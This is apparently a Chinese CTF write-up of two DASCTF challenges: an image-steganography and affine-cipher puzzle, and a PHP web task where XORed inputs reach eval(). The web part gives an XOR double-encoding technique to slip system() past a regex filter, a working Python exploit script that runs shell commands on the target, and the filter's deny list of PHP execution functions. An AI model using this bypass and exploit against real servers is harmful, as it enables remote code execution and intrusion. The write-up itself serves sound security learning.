1、MISC-eight_birds
题目下载之后发现一个不够8只鸟的jpg图片,然后修改高度发现affine_b19_b21
然后再图片尾部发现zip压缩包,然后发现有密码,然后尝试伪加密、字典、爆破都不行,最后才这个可能就是密码,然后试了发现这个就是密码,得到flag.txt
AVZHSM{91m4t51vv33h5m18o93t6o4hv86at87v}
发现不是DASCTF,同时联想仿射密码
得到flag如下:
DASCTF{91f4e51aa33c5f18b93e6b4ca86de87a}
2、WEB-HackMe
WEB只有一个Hello,开始爆破目录
<?php
include "waf.php";
error_reporting('0');
$str1 = $_POST['str1'];
$str2 = $_POST['str2'];
$str1 = base64_decode($str1);
$str2 = base64_decode($str2);
function HackMe($str1,$str2)
{
$str = "";
for ($i = 0;$i<strlen($str1);$i++)
{
$array1[$i] = $str1[$i];
}
for ($b = 0;$b<strlen($str2);$b++)
{
$array2[$b] = $str2[$b];
}
for ($c=0;$c <count($array1);$c++)
{
$str = $str.($array1[$c] ^ $array2[$c]);
}
if (strlen($str)<=30)
{
if (waf($str))
{
echo $str;
eval($str);
}
else
{
echo "ohhhhhhhhhhhhhhhhhhhhhhhh you can't get flag!!!!";
}
}
else
{
echo "nonono you are sooooooooo lang~";
}
}
if (!isset($_POST['str1']) && !isset($_POST['str2']))
{
$str1="(@@@@";
$str2="`%,,/";
}
HackMe($str1,$str2);
?>
程序需要传入str1和str2字符串,然后字符串经过异或后成为str,然后通过waf和长度30限制后就可以执行eval函数,通过测试发现waf过滤了大量的函数,然后可以输入字母等其他字符(不是无字符webshell),然后可以通过和特定字符!
异或进行构造,不过还是可以通过一部分绕过,如print_r(scandir('/'))
,然后经过提示发现可以通过通过两次异或,类似于无字符webshell那样传入异或的字符串绕过system过滤
print_r(scandir('/'));Array
(
[3] => bin
[4] => boot
[5] => dev
[6] => etc
[7] => home
[8] => lib
[9] => lib64
[10] => media
[11] => mnt
[12] => ohhhhhhhhhhhhhh_you_find_it
)
类似这样
E:\总结汇总\web总结\无字符webshell\异或方式>python3 step2.py
[+] your function:system
[+] your command:ls /
("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08%00%00"^"%60%7b%20%2f");
("000000"^"CICDU]")("ls /");
然后构造exp如下:
import base64
import requests
payload = 'system'
make_str = '0'*len(payload)
payload1 = ''
for i in range(len(payload)):
payload1 += chr(ord(payload[i])^ord(make_str[i]))
#print(payload1)
payload_1ceng = '''('{}'^'{}')('nl /*t');'''.format(make_str,payload1)
#payload_1ceng = 'print_r(scandir(\'/\'));'
make_str2 = '!'*len(payload_1ceng)
payload_2ceng = ''
for i in range(len(payload_1ceng)):
payload_2ceng += chr(ord(payload_1ceng[i])^ord(make_str2[i]))
str1 = base64.b64encode(make_str2)
str2 = base64.b64encode(payload_2ceng)
print(len(payload_1ceng))
session = requests.Session()
url = "http://80.endpoint-7c82c2b23fc14da8b2eda2f33569772e.m.ins.cloud.dasctf.com:81/"
paramsPost = {"str1":str1,"str2":str2}
response = session.post(url=url, data=paramsPost)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
获取waf.php如下:
1 <?php
2 function waf($str)
3 {
4 if(preg_match("/system|exec|eval|shell_exec|passthru|proc_open|proc_close|proc_get_status|checkdnsrr|getmxrr|getservbyname|getservbyport|syslog|popen|highlight_file|include|require|require_once|readfile|file|put|\.|<|>|\\\|x|-|\+|}|&|%|@|#|\\$|`|~|php|get|post|head|global|:/i", $str)){
5 return false;
6 }
7 else
8 {
9 return true;
10
11 }
12 }
13